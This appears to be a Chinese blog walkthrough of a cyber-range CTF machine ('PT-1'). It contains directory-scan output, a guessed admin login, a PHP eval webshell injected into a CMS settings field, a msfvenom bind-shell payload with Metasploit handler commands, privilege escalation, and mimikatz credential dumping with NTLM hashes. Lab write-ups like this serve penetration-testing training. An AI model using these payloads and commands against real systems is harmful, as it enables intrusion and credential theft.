PT-1靶机

`靶场平台
教程来自

kali 打靶记录, 靶机启动然后下载靶场提供的 openvpn 对应的客户端文件, 命令连接:

openvpn --config cyberstrikelab.com-PT-1.ovpn

然后就挂着他, 重开终端进行后续操作

靶场主页面:

再页面最下方看到了该网站的 cms

目录扫描:

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: D:\security\dirsearch-0.4.3\reports\http_10.0.0.68\__25-03-22_15-38-38.txt

Target: http://10.0.0.68/

[15:38:38] Starting:
[15:38:39] 403 -  215B  - /%C0%AE%C0%AE%C0%AF
[15:38:39] 403 -  211B  - /%3f/
[15:38:39] 301 -  228B  - /js  ->  http://10.0.0.68/js/
[15:38:39] 403 -  210B  - /%ff
[15:38:41] 403 -  220B  - /.ht_wsr.txt
[15:38:41] 403 -  223B  - /.htaccess.bak1
[15:38:41] 403 -  223B  - /.htaccess.orig
[15:38:41] 403 -  225B  - /.htaccess.sample
[15:38:41] 403 -  223B  - /.htaccess.save
[15:38:41] 403 -  223B  - /.htaccess_orig
[15:38:41] 403 -  224B  - /.htaccess_extra
[15:38:41] 403 -  221B  - /.htaccess_sc
[15:38:41] 403 -  221B  - /.htaccessBAK
[15:38:41] 403 -  221B  - /.htaccessOLD
[15:38:41] 403 -  222B  - /.htaccessOLD2
[15:38:41] 403 -  214B  - /.html
[15:38:41] 403 -  213B  - /.htm
[15:38:41] 403 -  223B  - /.htpasswd_test
[15:38:41] 403 -  219B  - /.htpasswds
[15:38:41] 403 -  220B  - /.httr-oauth
[15:38:55] 301 -  233B  - /article  ->  http://10.0.0.68/article/
[15:38:55] 200 -    1KB - /article/
[15:38:59] 301 -  233B  - /comment  ->  http://10.0.0.68/comment/
[15:39:01] 301 -  230B  - /data  ->  http://10.0.0.68/data/
[15:39:01] 200 -    1KB - /data/
[15:39:01] 200 -    3B  - /data/cache/
[15:39:01] 200 -    3B  - /data/sessions/
[15:39:02] 301 -  232B  - /detail  ->  http://10.0.0.68/detail/
[15:39:04] 200 -    1KB - /err.php
[15:39:05] 200 -   17KB - /favicon.ico
[15:39:08] 200 -    1KB - /i.php
[15:39:09] 301 -  233B  - /include  ->  http://10.0.0.68/include/
[15:39:09] 200 -    2KB - /include/
[15:39:09] 403 -  225B  - /index.php::$DATA
[15:39:09] 301 -  233B  - /Install  ->  http://10.0.0.68/Install/
[15:39:09] 301 -  233B  - /INSTALL  ->  http://10.0.0.68/INSTALL/
[15:39:09] 301 -  233B  - /install  ->  http://10.0.0.68/install/
[15:39:10] 200 -  782B  - /install/
[15:39:10] 200 -  590B  - /js/
[15:39:12] 301 -  230B  - /list  ->  http://10.0.0.68/list/
[15:39:12] 200 -   16KB - /login.php
[15:39:14] 200 -    5KB - /member.php
[15:39:16] 301 -  230B  - /news  ->  http://10.0.0.68/news/
[15:39:19] 301 -  236B  - /phpMyAdmin  ->  http://10.0.0.68/phpMyAdmin/
[15:39:19] 301 -  236B  - /phpmyadmin  ->  http://10.0.0.68/phpmyadmin/
[15:39:20] 200 -    2KB - /phpmyadmin/README
[15:39:20] 200 -   32KB - /phpmyadmin/ChangeLog
[15:39:22] 200 -    4KB - /phpMyAdmin/
[15:39:22] 200 -    4KB - /phpMyadmin/
[15:39:22] 200 -    4KB - /phpMyAdmin/index.php
[15:39:22] 200 -    4KB - /phpmyadmin/index.php
[15:39:22] 200 -    4KB - /phpmyAdmin/
[15:39:22] 200 -    4KB - /phpmyadmin/
[15:39:24] 200 -    1KB - /s.php
[15:39:25] 200 -    1KB - /search.php
[15:39:31] 301 -  234B  - /templets  ->  http://10.0.0.68/templets/
[15:39:32] 403 -  225B  - /Trace.axd::$DATA
[15:39:32] 301 -  231B  - /topic  ->  http://10.0.0.68/topic/
[15:39:33] 200 -  406B  - /uploads/
[15:39:33] 301 -  233B  - /uploads  ->  http://10.0.0.68/uploads/
[15:39:35] 301 -  231B  - /video  ->  http://10.0.0.68/video/
[15:39:36] 403 -  226B  - /web.config::$DATA

Task Completed

http://10.0.0.68/data/admin/ver.txt , 这个目录下的文件发现 cms 版本, 为 v12.9

然后寻找该 cms 的历史漏洞
访问 cms 后台:

猜测账号密码都是 cslab , 可以进入

在用户页面的会员消息通知这里插入一句话木马 1";@eval($_POST[cmd]);;//

这里 kali 不带蚁剑, 直接 github 下载对应的 linux 版本的蚁剑
蚁剑连接

c 盘发现 flag.txt

flag

go-flag{a3aecfd5-17db-52a0-ac1d-3a32124b04f4}

使用 msfvenom 正向连接
生成一个木马

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe 

然后在蚁剑里面直接选择上传文件到指定的目录下

使用命令行运行该木马

msf 配置并连接

msfconsole
 
use exploit/multi/handler
 
set payload windows/x64/meterpreter/bind_tcp
 
set rhost 10.0.0.68
 
set lport 4444
 
run

提权

meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

获取密码

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

用 load kiwi 命令载入 minikatz , 然后 creds_all 获取全部信息

meterpreter > load kiwi 
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-S4KAS0ERCGQ  cad8ef0c410c9709cea512052756ce5a  947e1029f3fc1ce2f1f6592a1e55844dd3152ea2

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
WIN-S4KAS0ERCGQ$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
win-s4kas0ercgq$  WORKGROUP        (null)

flag2 题目要求是 ntmlhash 值:

cad8ef0c410c9709cea512052756ce5a
posted @ 2025-03-25 18:05  livitor  阅读(801)  评论(0)    收藏  举报